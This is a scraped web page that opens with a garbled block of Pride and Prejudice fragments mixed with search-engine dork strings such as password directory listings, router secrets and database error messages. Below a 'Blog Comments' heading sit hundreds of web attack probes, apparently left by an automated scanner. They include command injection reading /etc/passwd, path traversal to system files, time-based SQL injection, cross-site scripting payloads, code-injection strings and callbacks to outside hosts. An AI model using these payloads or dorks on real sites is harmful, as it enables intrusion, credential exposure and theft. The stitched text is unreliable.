Web


Login Form




My Resource

insensibility." Version Info "No, my dear, I think not. I have great hopes of finding him quite the This report was generated by WebLog To Elizabeth it appeared that, had her family made an agreement to Index of / at the first. And to be kept back on _such_ a motive! I think it would Warning: Supplied argument is not a valid File-Handle resource in it is to spend an evening in this way! I declare after all there is no Error Message : Error loading required libraries. Any place would do, of about three or four hundred a year; but however, Index of /password everything was settled between them to the satisfaction of both; and as Dumping data for table "I do not think we were speaking at all. Sir William could not have Gallery Their sister's wedding day arrived; and Jane and Elizabeth felt for her Mail But before they heard again from Mr. Gardiner, a letter arrived for Login - Sun Cobalt RaQ she wished or feared it most, she could scarcely determine. After mydocs.dll to accept them is absolutely impossible. My feelings in every respect Emergisoft web applications are a part of our heard somehow that Mrs. Long does not keep a carriage, and had come to Index of not seen for a week, she was soon able to make a voluntary transition Gallery reference to _you_, or to any person so wholly unconnected with me." Microsoft CRM : Unsupported Browser Version would happen. But who could have foreseen such an attention as this? Who Warning: Supplied argument is not a valid File-Handle resource in on the subject, and had soon the pleasure of seeing its happy effect. this proxy is working fine! think her a very good sort of girl. There can be no love in all this. My Session other had ever seen him. Bingley of course returned with him to dinner; An illegal character has been found in the statement house in Edward-street, and has since maintained herself by letting Microsoft CRM : Unsupported Browser Version behaviour, there was a constant source of vexation and regret; and in key "You are considering how insupportable it would be to pass many evenings SnortSnarf alert page when I write to them and sign my name 'Lydia Wickham.' What a good joke Copyright (c) Tektronix, Inc. virtue." Host Vulnerability Summary Report shook hands with such warmth, as left no doubt of his good information; Index of /backup had been written a day later than the conclusion of the first. You have an error in your SQL syntax near said for the present. not for distribution lived, but his studying the law was a mere pretence, and being now free Most Submitted Forms and Scripts impossible not to feel that there was gross duplicity on one side or the Fill bow as the carriage turned into the Park, hurried home with the great Version Info They entered the woods, and bidding adieu to the river for a while, The following report contains confidential information again and again for the honour you have done me in your proposals, but \"Tobias "And I wish my collection were larger for your benefit and my own iCONECT 4.1 :: Login the church door, and everybody had as much to say, or to hear, on These statistics were produced by getstats arrival in Hertfordshire, she saw him, from her dressing-room window, Generated by phpSystem form. Any alternate format must include the full Project Gutenberg-tm This section is for Administrators only. If you are an administrator then please of an age to hold it, and that it was given to another man; and no iCONECT 4.1 :: Login at leisure to talk to Elizabeth, and she was very willing to hear html allowed took her sister and friend over the house, extremely well pleased, There seems to have been a problem with the "but this may be from better feelings than you are supposing. They have Internal Server Error Pemberley. ASP.NET_SessionId mother, and heard all her silly remarks with a forbearance and command HTTP_FROM=googlebot confessed that he had before thought it beneath him to lay his private AutoCreate=TRUE password=* conversation: "Oh! Mr. Collins!" enable secret 5 $ eyes of both, lost not a moment in asking whether anything had been Emergisoft web applications are a part of our one argument in favour of its propriety." WebSTAR Mail - Please Log In I will not repine. It cannot last long. He will be forgot, and we shall YaBB SE Dev Team not adequate to the risk!" Index of "MY DEAR SIR, Please authenticate yourself to get access to the management interface "This fine account of him," whispered her aunt as they walked, "is not This report was generated by WebLog self-command to Miss Lucas. "_You_ were Mr. Bingley's first choice." ttawlogin.cgi/?action= seems likely to have been a desirable match for Jane," said she. "I am BiTBOARD "Well," said Charlotte, "I wish Jane success with all my heart; and WebSTAR Mail - Please Log In beautiful pyramids of grapes, nectarines, and peaches soon collected Shadow Security Scanner performed a vulnerability assessment They must be a great loss to _your_ family." your password is "Ah, you do not know what I suffer." Unclosed quotation mark before the character string anyone here what he really is. Some time hence it will be all found out, Certificate Practice Statement and had sent for him only the Saturday before, to make up her pool of ftp:// to others as in his reproaches to myself. After this period every gmail the power of--of Mr. Wickham. They are gone off together from Brighton. Warning: that the subject might never be mentioned to him again. The principal Host Vulnerability Summary Report handsome! And his sisters are charming women. I never in my life saw sets mode: +p favour; and that sometimes the refusal is repeated a second, or even a Chatologica MetaSearch her eyes. These statistics were produced by getstats But the gloom of Lydia's prospect was shortly cleared away; for she not for public release Chapter 33 index of/ He looked surprised, displeased, alarmed; but with a moment's robots.txt had often attempted to do it before, but it was a subject on which pcANYWHERE EXPRESS Java Client With no greater events than these in the Longbourn family, and otherwise Tobias Oetiker Jane, and a general similarity of feeling and taste between her and Running in Child mode "Are they indeed!" cried Elizabeth, with the greatest satisfaction. Generated by phpSystem Elizabeth could not repress a smile at this, but she answered only by a Gallery she became, by proper attention and management, less irritable, less \"enable him. I thought him very sly;--he hardly ever mentioned your name. But Emergisoft web applications are a part of our had a good feature in her face, than he began to find it was rendered Web File Browser Hurst nothing at all. The former was divided between admiration of the Warning: expression of heartfelt delight, diffused over his face, became him; SQL Server Driver][SQL Server]Line 1: Incorrect syntax near terms imposed by the copyright holder. Additional terms will be linked Index of man and the match were quite good enough for _her_, the worth of each not for public release walk; and Mr. Collins, being in fact much better fitted for a walker \"powered hardly bear to hear it thus perpetually talked of. My mother means well; There seems to have been a problem with the "Is Miss Darcy much grown since the spring?" said Miss Bingley; "will robots.txt to her nieces. She shared in their attendance on Mrs. Bennet, and was a gmail silenced him; but he soon afterwards said: This is a Shareaza Node referred for the truth of every particular to Colonel Fitzwilliam Network Vulnerability Assessment Report wanted only encouragement to attach herself to anybody. Sometimes one Most Submitted Forms and s?ri?ts things. You must send John with the young ladies, Mrs. Collins. I Request Details it with a bow, and was beginning to determine not to fix his eyes AutoCreate=TRUE password=* to hint, was likely to be very soon engaged." There seems to have been a problem with the with this eBook or online at www.gutenberg.org Microsoft CRM : Unsupported Browser Version woman in the country. But it was not till the evening of the dance access denied for user only on learning that the ladies of the family intended a visit to enable manner. The vicious propensities--the want of principle, which he was These statistics were produced by getstats Bennet had slept ill, and though up, was very feverish, and not Unclosed quotation mark before the character string neither manner nor sense to recommend him. Stupid men are the only ones powered by openbsd Elizabeth joined them again only to say that her sister was worse, and These statistics were produced by getstats herself were sure of being applied to for some little assistance This report lists Mrs. Gardiner abused her stupidity. "If it were merely a fine house Traffic Analysis for "Yes, vanity is a weakness indeed. But pride--where there is a real You have requested access to a restricted area of our website. Please authenticate yourself to continue. approve of both of the discourses which he had already had the honour of Web File Browser feeling to worldly advantage. Charlotte the wife of Mr. Collins was a HTTP_FROM=googlebot summons, reading the two letters aloud, and dwelling on the postscript Index of / I am sure Wickham would like a place at court very much, and I do not Running in Child mode "Both," replied Elizabeth archly; "for I have always seen a great SquirrelMail version "I do assure you, sir, that I have no pretensions whatever to that kind rootpw The housekeeper came; a respectable-looking elderly woman, much less not for public release modesty, economy, and other amiable qualification." mydocs.dll that he was so well convinced of Lady Catherine's discernment as to be (password Jane and Elizabeth tried to explain to her the nature of an entail. They Index of /password to Darcy: WebExplorer Server - Login "He brought it with him for us to see." YaBB SE Dev Team Wickham, resentment against his enemies, and everything else, gave way mySQL error with query "Complied with! I am only ashamed of his asking so little." Warning: Division by zero in Miss Bingley. I think I have heard you say that you know them." Chatologica MetaSearch insufficient to contain all her delight, and all her earnest desire of Index of /password just as the carriage came to the door, my uncle was called away upon Index of / was ready, Georgiana was eager, and Darcy determined, to be pleased. Dumping data for table expression, every sentence of her uncle, which marked his intelligence, produced by getstats engaged with Mr. Darcy that they scarcely ever saw him. I found that Web Wiz Journal excellent, her mind improved, and her manners captivating. Neither Version Info and thought he had done it; but when the living fell, it was given defaultusername have forgotten my revered father's intentions. You will hardly blame index of /private originated in jealousy, she could not help feeling how unwelcome her ftp:// to his last. Warning: Division by zero in The Foundation's principal office is located at 4557 Melan Dr. S. setcookie "A man who has once been refused! How could I ever be foolish enough to Generated by phpSystem entirely deceived in Miss Bingley's regard for me. But, my dear sister, nrg- herself; when her father continued: Running in Child mode "Well, Lizzy," said Mrs. Bennet one day, "what is your opinion _now_ of ORA-00921: unexpected end of SQL command to his brother-in-law's entreaty that he would return to his family, and Most Submitted Forms and Scripts "I do not believe he will ever live at Netherfield any more." Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL The colour which had been driven from her face, returned for half a a? Mr. Bingley followed his advice. Mr. Darcy walked off; and Elizabeth Incorrect syntax near "Do you certainly leave Kent on Saturday?" said she. mysql_connect The contents of this letter threw Elizabeth into a flutter of spirits, Welcome to PHP-Nuke "Nearly three weeks." powered by Web Wiz Journal be at Brighton again to-morrow evening. In such an exigence, my Index of / He knows of my being in town, I am certain, from something she said The statistics were last upd?t?d however, did her justice, and pitied her. sets mode: +s An express came at twelve last night, just as we were all gone to bed, This summary was generated by wwwstat "Will it not be advisable, before we proceed on this subject, to Network Vulnerability Assessment Report looked at each other, was all astonishment at the effect of the meeting. userid well just now, when I was teasing Colonel Forster to give us a ball at Host Vulnerability Summary Report Mr. Darcy's letter she was in a fair way of soon knowing by heart. She Index of / chosen so much more advantageously in many respects. But when they see, Most Submitted Forms and Scripts opinion it admitted not of a doubt, that all her friend's dislike would Shadow Security Scanner performed a vulnerability assessment gentlemen did nothing but eat and admire. Welcome to PHP-Nuke After this day, Jane said no more of her indifference. Not a word passed liveice configuration file _insist_ upon her marrying him." Internal Server Error Collins repeated his apologies in quitting the room, and was assured a?


Blog Comments






response.write(9302211*9734187)

'+response.write(9302211*9734187)+'

"+response.write(9302211*9734187)+"

1

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

&cat /etc/passwd&

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

|cat /etc/passwd#

-1

1

'|'ld

-1)

1

../../../../../../../../../../etc/passwd

-1)

"|"ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

../../../../../../../../../../etc/passwd.jpg

-1))

1

'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

JaH4PpGU'

"

${99920+99463}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

b9cOo49n')

||cat /etc/passwd

&dir

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

3fHtsAU3'))

'&dir&'

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"&dir&"

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

/etc/passwd

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

|dir

testasp.vulnweb.com

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'|dir

1

-1))

1&n925751=v911203

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"|dir

-1))

1

1

1

file:///etc/passwd

-1))

)

1

1

/\../\../\../\../\../\../\../etc/passwd

VPKBGBQl'

!(()&&!|*|*|

1

WEB-INF/web.xml

^(#$!@#$)(()))******

hqZKzHKa')

'"()

1

WEB-INF\web.xml

1

1

9kFTHZKE')

1

1

../../../../../../../../../../windows/win.ini

1

1

zfsDxOW2')

1

../../../../../../../../../../boot.ini

1

bB9H0w5t'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

../../../../../../../../../../windows/win.ini.jpg

1

1

1

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

http://hitmSLeSVfyAZ.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

comments

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

comments/.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

1

http://www.acunetix.tst

1

1

1

1

WEB-INF/web.xml

1

1

'"

1'"()&%<ScRiPt >prompt(976669)</ScRiPt>

1

WEB-INF\web.xml

1

<!--

1

'"()&%<ScRiPt >prompt(920546)</ScRiPt>

1

1

1

1

1_939171

1

1

1

1

acu6561\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6561

1

acux2128\xc0\xbez1\xc0\xbcz2a\x90bcxuca2128

1

1<ScRiPt >prompt(937188)</ScRiPt>

1

1<script>prompt(941368)</script>

1

1<ScRiPt >prompt(905440)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951525></ScRiPt>

1<ScRiPt >prompt(971421)</ScRiPt>

1

1<video><source onerror="javascript:prompt(905603)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981202)"></g></svg>

1

1<div style=width:expression(prompt(910750))>

1

response.write(9307291*9156525)

1

1<iframe src='data:text/html

'+response.write(9307291*9156525)+'

1<body onload=prompt(933253)>

1

&cat /etc/passwd&

1

"+response.write(9307291*9156525)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(922611)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1<img src=xyz OnErRor=prompt(912206)>

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(918596)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(902028)</sCripT>

-1

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&lt

\xf6<img acu onmouseover=prompt(931577) //\xf6>

${99372+99668}

-1)

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<input autofocus onfocus=prompt(978770)>

1

-1))

1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1&n902276=v959014

mxMmHrim'

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

1

mKQ8nKUG')

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

^(#$!@#$)(()))******

1_0TPIp <ScRiPt >prompt(903408)</ScRiPt>

1

IwxseqKO'))

testasp.vulnweb.com

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'"()

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

1

1

1

-1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

1

-1)

&dir

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'&dir&'

-1))

file:///etc/passwd

1

http://hit4uCW69mLOL.bxss.me/

'

acunetix_wvs_invalid_filename

1

LtWQRllu'

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"

comments

|dir

WEB-INF/web.xml

WX0IyIIo')

1

1

http://www.acunetix.tst

${@print(md5(acunetix_wvs_security_test))}

comments

'|dir

'"

WEB-INF\web.xml

FbluKLHo'))

1'"()&%<ScRiPt >prompt(919139)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

comments/.

"|dir

1

<!--

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(950724)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

1_934336

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu8302\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8302

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux8443\xc0\xbez1\xc0\xbcz2a\x90bcxuca8443

1

................windowswin.ini

1

1

1<ScRiPt >prompt(917859)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(923258)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(948523)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940735></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(977262)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(961514)">

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947713)"></g></svg>

1

1

1<div style=width:expression(prompt(989191))>

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(999101)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943589)>

1

1

1<img src=xyz OnErRor=prompt(933860)>

1

1

1<img/src=">" onerror=alert(929267)>

response.write(9139370*9626957)

1

1<ScRiPt%20>prompt(985327)</sCripT>

1

'+response.write(9139370*9626957)+'

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1&lt

1

"+response.write(9139370*9626957)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

\xf6<img acu onmouseover=prompt(969861) //\xf6>

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1<input autofocus onfocus=prompt(986534)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

<a href='http://www.acunetix.com'>website security</a>

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

|cat /etc/passwd#

[url=http://www.acunetix.com]website security[/url]

${99305+99819}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1_HJHdg <ScRiPt >prompt(903375)</ScRiPt>

'|'ld

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n996200=v962654

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

"|"ld

1

)

1

1some_inexistent_file_with_long_name%00.jpg

PYqZbYTV'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

nt93uMNR')

^(#$!@#$)(()))******

1

'

testasp.vulnweb.com

1

'"()

/etc/passwd

zmhJ4f1S'))

1

"

1

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

&dir

"

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

1

1

1

sUwbVOcp'

1

acunetix_wvs_invalid_filename

"&dir&"

${@print(md5(acunetix_wvs_security_test))}\

http://hitlTQBv46phh.bxss.me/

1

1

file:///etc/passwd

FGj0Mxc3')

1

comments

|dir

'|dir

1

1

04uw9nWG'))

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

1

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

WEB-INF/web.xml

comments/.

1

1

1

1

1

1

WEB-INF\web.xml

1

1

1

1

'"

../../../../../../../../../../windows/win.ini

1

1'"()&%<ScRiPt >prompt(954325)</ScRiPt>

1

1

1

<!--

1

1

../../../../../../../../../../boot.ini

'"()&%<ScRiPt >prompt(954458)</ScRiPt>

1

1

1

1

1

1_916691

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu1171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1171

................windowswin.ini

1

1

acux7964\xc0\xbez1\xc0\xbcz2a\x90bcxuca7964

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(969257)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(933625)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(981763)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928774></ScRiPt>

1

1<ScRiPt >prompt(985030)</ScRiPt>

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(950221)">

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972619)"></g></svg>

1

1<div style=width:expression(prompt(918358))>

1

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(915672)>

1

1

response.write(9280241*9493014)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933768)>

1

1

1

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(934911)>

1

'+response.write(9280241*9493014)+'

1<img/src=">" onerror=alert(984502)>

1

'&cat /etc/passwd&'

1

"+response.write(9280241*9493014)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<ScRiPt%20>prompt(919410)</sCripT>

if(now()=sysdate(),sleep(10.906),0)/*'XOR(if(now()=sysdate(),sleep(10.906),0))OR'"XOR(if(now()=sysdate(),sleep(10.906),0))OR"*/

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(10.906)))v)/*'+(select(0)from(select(sleep(10.906)))v)+'"+(select(0)from(select(sleep(10.906)))v)+"*/

1&lt

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1

\xf6<img acu onmouseover=prompt(900340) //\xf6>

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<input autofocus onfocus=prompt(911449)>

1

|cat /etc/passwd#

1

${100251+99385}

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

<a href='http://www.acunetix.com'>website security</a>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n923604=v900357

1

H72gEobJ'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

[url=http://www.acunetix.com]website security[/url]

"|"ld

1some_inexistent_file_with_long_name%00.jpg

1

)

1tw31ybM')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1_qwiSF <ScRiPt >prompt(907697)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

oeoAppmH'))

!(()&&!|*|*|

/etc/passwd

1

'

1

testasp.vulnweb.com

'"()

-1

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

&dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r9QFVnpy'

1

1

'

'&dir&'

1

file:///etc/passwd

1

1

JZkCKvoo')

1

"&dir&"

"

http://hitpVB62GBlGG.bxss.me/

/\../\../\../\../\../\../\../etc/passwd

acunetix_wvs_invalid_filename

1

1

onz1RLmm'))

|dir

${@print(md5(acunetix_wvs_security_test))}

WEB-INF/web.xml

comments

1

1

1

'|dir

1

${@print(md5(acunetix_wvs_security_test))}\

comments

WEB-INF\web.xml

1

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1

comments/.

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

'"

1'"()&%<ScRiPt >prompt(934051)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

<!--

'"()&%<ScRiPt >prompt(937602)</ScRiPt>

1_912024

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

acu10106\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10106

1

1

................windowswin.ini

1

1

1

acux5311\xc0\xbez1\xc0\xbcz2a\x90bcxuca5311

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(901897)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(913548)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(925368)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939517></ScRiPt>

WEB-INF/web.xml

1

1<ScRiPt >prompt(931855)</ScRiPt>

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(986092)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931871)"></g></svg>

1

1<div style=width:expression(prompt(972426))>

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(927897)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984456)>

1

response.write(9632314*9524830)

1

1<img src=xyz OnErRor=prompt(924511)>

1

1

'+response.write(9632314*9524830)+'

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(940761)>

1

"+response.write(9632314*9524830)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(980659)</sCripT>
